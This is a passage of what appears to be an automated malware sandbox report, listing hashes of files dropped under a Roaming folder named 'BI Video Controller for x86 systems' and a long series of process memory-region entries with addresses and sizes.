                            c9e8c6ae521dbd7e92af06e8a3581835058667ff6b502aa55ff4993c1b639e896c8f3ab6e0ca105e5635a66a40d92b4db96512e2ed337268b76ed611155e2402

                          • \Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
                            MD5

                            cf8114289d40ec83b53463b1ac8930c9

                            SHA1

                            00036a509bc31c4264a0414d3386f420854ca047

                            SHA256

                            39b7e686bb324ecf81adc0b6a165830cd4d3f7d8a2bbba310930fa023f95bb12

                            SHA512

                            e19af0dcf1aa8253523a1eba1c69f5f26cc63730ef630c60c4ce46d368b037753110426c7e3db333041046dbb04ccffec2bfd48529e1cdaab6547e331df02fc9

                          • \Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
                            MD5

                            cf8114289d40ec83b53463b1ac8930c9

                            SHA1

                            00036a509bc31c4264a0414d3386f420854ca047

                            SHA256

                            39b7e686bb324ecf81adc0b6a165830cd4d3f7d8a2bbba310930fa023f95bb12

                            SHA512

                            e19af0dcf1aa8253523a1eba1c69f5f26cc63730ef630c60c4ce46d368b037753110426c7e3db333041046dbb04ccffec2bfd48529e1cdaab6547e331df02fc9

                          • \Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\libfreetype-4.dll
                            MD5

                            96f1c8a9c83fbf6411f35d3de8fdc77c

                            SHA1

                            41b590133df449c8e0ce247aab7def7cfc39399d

                            SHA256

                            ae8db0fc9690c6047bd1d1aeb7cd254060c0623700bb184ce3f1b3d1daffc39e

                            SHA512

                            fa214f15b7c77eca2760aa2489debc5d7244f5535a7b725b49ae7f9ba6f5341a04ee2ccabe15f1e70a542582ed64758d1b4e2d61faaacf2a56e3ec750df76baa

                          • memory/472-222-0x0000000000000000-mapping.dmp
                          • memory/472-226-0x00000000000D0000-0x00000000000D5000-memory.dmp
                            Filesize

                            20KB

                          • memory/472-227-0x00000000000C0000-0x00000000000C9000-memory.dmp
                            Filesize

                            36KB

                          • memory/536-73-0x0000000000400000-0x00000000004D8000-memory.dmp
                            Filesize

                            864KB

                          • memory/536-68-0x0000000000000000-mapping.dmp
                          • memory/560-78-0x00000000001D0000-0x00000000001D1000-memory.dmp
                            Filesize

                            4KB

                          • memory/560-75-0x0000000000000000-mapping.dmp
                          • memory/676-146-0x00000000025E0000-0x00000000025E1000-memory.dmp
                            Filesize

                            4KB

                          • memory/676-143-0x0000000004A02000-0x0000000004A03000-memory.dmp
                            Filesize

                            4KB

                          • memory/676-64-0x0000000000000000-mapping.dmp
                          • memory/676-142-0x0000000004A00000-0x0000000004A01000-memory.dmp
                            Filesize

                            4KB

                          • memory/676-182-0x0000000006240000-0x0000000006241000-memory.dmp
                            Filesize

                            4KB

                          • memory/676-137-0x0000000004A40000-0x0000000004A41000-memory.dmp
                            Filesize

                            4KB

                          • memory/676-174-0x00000000060E0000-0x00000000060E1000-memory.dmp
                            Filesize

                            4KB

                          • memory/676-128-0x0000000000000000-mapping.dmp
                          • memory/676-161-0x00000000056B0000-0x00000000056B1000-memory.dmp
                            Filesize

                            4KB

                          • memory/676-172-0x000000007EF30000-0x000000007EF31000-memory.dmp
                            Filesize

                            4KB

                          • memory/676-136-0x0000000000910000-0x0000000000911000-memory.dmp
                            Filesize

                            4KB

                          • memory/676-149-0x0000000002890000-0x0000000002891000-memory.dmp
                            Filesize

                            4KB

                          • memory/676-169-0x00000000056F0000-0x00000000056F1000-memory.dmp
                            Filesize

                            4KB

                          • memory/916-209-0x0000000000080000-0x0000000000089000-memory.dmp
                            Filesize

                            36KB

                          • memory/916-208-0x0000000000090000-0x0000000000094000-memory.dmp
                            Filesize

                            16KB

                          • memory/916-204-0x0000000000000000-mapping.dmp
                          • memory/920-151-0x0000000000160000-0x00000000001CB000-memory.dmp
                            Filesize

                            428KB

                          • memory/920-223-0x0000000000000000-mapping.dmp
                          • memory/920-144-0x000000006D851000-0x000000006D853000-memory.dmp
                            Filesize

                            8KB

                          • memory/920-150-0x00000000001D0000-0x0000000000244000-memory.dmp
                            Filesize

                            464KB

                          • memory/920-138-0x0000000000000000-mapping.dmp
                          • memory/932-201-0x00000000000F0000-0x00000000000F6000-memory.dmp
                            Filesize

                            24KB

                          • memory/932-196-0x0000000000000000-mapping.dmp
                          • memory/932-202-0x00000000000E0000-0x00000000000EC000-memory.dmp
                            Filesize

                            48KB

                          • memory/1056-122-0x0000000004F70000-0x0000000004F71000-memory.dmp
                            Filesize

                            4KB

                          • memory/1056-80-0x0000000000000000-mapping.dmp
                          • memory/1056-94-0x0000000000880000-0x0000000000881000-memory.dmp
                            Filesize

                            4KB

                          • memory/1096-260-0x000000000044003F-mapping.dmp
                          • memory/1096-264-0x0000000000400000-0x0000000000495000-memory.dmp
                            Filesize

                            596KB

                          • memory/1136-97-0x0000000073FA1000-0x0000000073FA3000-memory.dmp
                            Filesize

                            8KB

                          • memory/1136-92-0x0000000000240000-0x0000000000241000-memory.dmp
                            Filesize

                            4KB

                          • memory/1136-88-0x0000000000000000-mapping.dmp
                          • memory/1144-221-0x0000000005780000-0x0000000005781000-memory.dmp
                            Filesize

                            4KB

                          • memory/1144-199-0x0000000001310000-0x0000000001311000-memory.dmp
                            Filesize

                            4KB

                          • memory/1144-200-0x0000000001312000-0x0000000001313000-memory.dmp
                            Filesize

                            4KB

                          • memory/1144-198-0x0000000004820000-0x0000000004821000-memory.dmp
                            Filesize

                            4KB

                          • memory/1144-197-0x0000000001000000-0x0000000001001000-memory.dmp
                            Filesize

                            4KB

                          • memory/1144-203-0x0000000001210000-0x0000000001211000-memory.dmp
                            Filesize

                            4KB

                          • memory/1144-187-0x0000000000000000-mapping.dmp
                          • memory/1144-207-0x0000000005380000-0x0000000005381000-memory.dmp
                            Filesize

                            4KB

                          • memory/1144-228-0x0000000006500000-0x000000000665B000-memory.dmp
                            Filesize

                            1.4MB

                          • memory/1152-241-0x0000000005750000-0x0000000005751000-memory.dmp
                            Filesize

                            4KB

                          • memory/1152-237-0x0000000001302000-0x0000000001303000-memory.dmp
                            Filesize

                            4KB

                          • memory/1152-236-0x0000000001300000-0x0000000001301000-memory.dmp
                            Filesize

                            4KB

                          • memory/1152-229-0x0000000000000000-mapping.dmp
                          • memory/1160-156-0x000000006D481000-0x000000006D483000-memory.dmp
                            Filesize

                            8KB

                          • memory/1160-158-0x0000000000080000-0x000000000008B000-memory.dmp
                            Filesize

                            44KB

                          • memory/1160-157-0x0000000000090000-0x0000000000097000-memory.dmp
                            Filesize

                            28KB

                          • memory/1160-154-0x0000000000000000-mapping.dmp
                          • memory/1200-63-0x0000000002B30000-0x0000000002B46000-memory.dmp
                            Filesize

                            88KB

                          • memory/1240-60-0x0000000000402E1A-mapping.dmp
                          • memory/1240-59-0x0000000000400000-0x0000000000409000-memory.dmp
                            Filesize

                            36KB

                          • memory/1240-61-0x00000000766D1000-0x00000000766D3000-memory.dmp
                            Filesize

                            8KB

                          • memory/1252-211-0x00000000000F0000-0x00000000000F5000-memory.dmp
                            Filesize

                            20KB

                          • memory/1252-219-0x00000000000E0000-0x00000000000E9000-memory.dmp
                            Filesize

                            36KB

                          • memory/1252-210-0x0000000000000000-mapping.dmp
                          • memory/1288-283-0x0000000000000000-mapping.dmp
                          • memory/1340-91-0x0000000000400000-0x00000000004D8000-memory.dmp
                            Filesize

                            864KB

                          • memory/1340-81-0x0000000000000000-mapping.dmp
                          • memory/1348-273-0x0000000000000000-mapping.dmp
                          • memory/1348-284-0x00000000048D0000-0x00000000048D1000-memory.dmp
                            Filesize

                            4KB

                          • memory/1348-105-0x0000000000400000-0x0000000002C84000-memory.dmp
                            Filesize

                            40.5MB

                          • memory/1348-104-0x0000000000220000-0x000000000025B000-memory.dmp
                            Filesize

                            236KB

                          • memory/1348-96-0x0000000000000000-mapping.dmp
                          • memory/1424-188-0x0000000000000000-mapping.dmp
                          • memory/1424-193-0x0000000000080000-0x0000000000089000-memory.dmp
                            Filesize

                            36KB

                          • memory/1424-192-0x0000000000090000-0x0000000000095000-memory.dmp
                            Filesize

                            20KB

                          • memory/1476-220-0x0000000000000000-mapping.dmp
                          • memory/1484-129-0x0000000000000000-mapping.dmp
                          • memory/1484-145-0x0000000000400000-0x0000000002CB1000-memory.dmp
                            Filesize

                            40.7MB

                          • memory/1484-140-0x0000000000270000-0x0000000000303000-memory.dmp
                            Filesize

                            588KB

                          • memory/1584-111-0x0000000000000000-mapping.dmp
                          • memory/1612-282-0x0000000000000000-mapping.dmp
                          • memory/1644-62-0x00000000001B0000-0x00000000001BA000-memory.dmp
                            Filesize

                            40KB

                          • memory/1828-153-0x0000000000060000-0x000000000006C000-memory.dmp
                            Filesize

                            48KB

                          • memory/1828-152-0x00000000000F0000-0x00000000000F7000-memory.dmp
                            Filesize

                            28KB

                          • memory/1828-147-0x0000000000000000-mapping.dmp
                          • memory/1940-173-0x0000000000070000-0x0000000000079000-memory.dmp
                            Filesize

                            36KB

                          • memory/1940-165-0x0000000000000000-mapping.dmp
                          • memory/1940-175-0x0000000000060000-0x000000000006F000-memory.dmp
                            Filesize

                            60KB

                          • memory/1960-124-0x0000000000000000-mapping.dmp
                          • memory/1960-132-0x0000000000330000-0x0000000000331000-memory.dmp
                            Filesize

                            4KB

                          • memory/1960-141-0x0000000004F20000-0x0000000004F21000-memory.dmp
                            Filesize

                            4KB

                          • memory/1968-265-0x0000000000000000-mapping.dmp
                          • memory/1988-103-0x0000000000000000-mapping.dmp
                          • memory/1988-116-0x0000000000400000-0x0000000002C84000-memory.dmp
                            Filesize

                            40.5MB

                          • memory/2012-117-0x0000000000000000-mapping.dmp
                          • memory/2012-120-0x0000000000D70000-0x0000000000D71000-memory.dmp
                            Filesize

                            4KB

                          • memory/2012-123-0x0000000000210000-0x0000000000211000-memory.dmp
                            Filesize

                            4KB